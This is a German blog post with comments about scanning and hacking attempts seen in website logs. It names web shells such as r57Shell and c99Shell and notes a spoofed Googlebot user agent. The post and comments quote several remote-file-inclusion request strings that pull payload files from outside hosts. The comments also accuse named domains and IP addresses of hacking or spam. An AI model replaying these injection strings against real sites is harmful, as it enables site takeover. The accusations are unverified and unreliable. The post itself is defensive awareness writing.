RSS Hacken wir eine Website

verfasst 13.04.2008 von MediaCix | kurze URL: /t274 | 4 Kommentare

Hacken wir eine Website

Nein, natürlich nicht. Und richtige Hacker machen das nicht selber, sondern schreiben dazu Scripte welche die Arbeit abnehmen. Für Programmierer ist das sicherlich nichts neues, wenn Websites ständig mit Portscan oder kuriosen Links aufgerufen werden. Aber hin wieder lohnt es sich, mal seine Logs zu kontrollieren und nach Bots zu suchen, die in wirklichkeit keine sind.

In Zeiten von fertigen Produkten wie Forum phpBB, CMS Joomla oder Blogs mit Wordspress steigt auch die Gefahr, dass diverse Lücken im System sind wo fremde schädliche Codes einschleusen können. Meine eigenen Projekte sind davon auch nicht ausgeschlossen. Und sehr oft werden diverse Anfragen mit falschen Angaben gemacht. So denkt der einfache User das z.B. der GoogleBot eben seine Seite besucht, aber in wirklichkeit ist ein Script was aus Russland kommt.

X Poison Hack Shell, ShellBOT Atrix, r57Shell, c99Shell, CrystalShell oder Cyber Shell. Die Namen für diese Scripte sind utopisch lang. Scripte die meist in Perl programmiert sind, und dazu gedacht sind den vollen Zugriff auf eine fremde Website zu bekommen. Teilweise wird so auch E-Mail-Spam von ahnungslosen Websites versendet, und die Betreiber bekommen das gar nicht.

Dazu müssen aber erstmal diese Scripte auf die Website kommen. Und hier werden Websites, Portale, Blogs und/oder Foren regelrecht abgetastet. Ein Beispiel wie so etwas bei einen phpBB-Forum aussehen könnte:

/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tare12.nm.ru/cmd.txt?????
/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://irc0de.runhost.net/id.txt?


Oder es wird versucht, an irgendwelche Seiten oder Links folgenes anzuhängen:

http://myownmarriage.chat.ru/images?
http://myweddingphotos.by.ru/images?


Als Besucher wird dann der GoogleBot vorgestäuscht:

Googlebot/2.1 (+http://www.googlebot.com/bot.html)


Oder die Website wird mit gezielten URLs attaktiert:

/playlist.php/db.php?commonpath=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt?
/test.php?page=http://www.imageforum.ru//language/lang_english/languages/test.txt???


Das Thema ist nicht neu, aber vieleicht mal wieder ein Punkt zum Nachdenken.
Besonders für Programmierer!

[Update]

Achja, damit es Hacker recht einfach haben und sich zurücklehnen können, gibt es XRumer. Eine Software mit der Massen-Spam auf Foren möglich ist.

screen_xrumer.png

bisherige Kommentare

1
14.04.2008
Cix88 meint dazu:
Da hab ich noch schöne Beispiele:

/includes/themen_portal_mitte.php?phpbb_root_path=http://www.ihmmank.net/mode/id.txt
/common/buycd.php?commonpath=http://www.boewe-security.de/galerie//update/data.txt


Einige Admins, wie im Beispiel von www.boewe-security.de, werden es gar nicht wissen, dass ihre Website bereits gehackt wurde und das dort böse Perl-Scripte laufen.

2
16.04.2008
Cix88 meint dazu:
Link-Spam wird nicht nur aus dem Ausland gemacht, auch sind teilweise deutsche Websites im Spiel. So ging mir jetzt ein Kandidat von vs1143093.vserver.de (62.75.143.93) in die Falle. Der jeweilige Anbieter wurde bereits verständigt, und der Betreiber von vs1143093.vserver.de darf sich jetzt freuen.

3
17.04.2008
Cix88 meint dazu:
Und der nächste Kandidat ging in die Falle:
87.230.16.150 - mail.macdubh.de
Auch von hier wird massiv Link-Spam betrieben.

4
07.04.2009
sipanz meint dazu:
wie kann ich jetzt also eine website hacken ?



Themen mit ähnlichen Inhalten

    - keine weiteren Themen gefunden -

Tags zum Beitrag

shellbot     r57shell     c99shell     crystalshell     cyber-shell     xrumer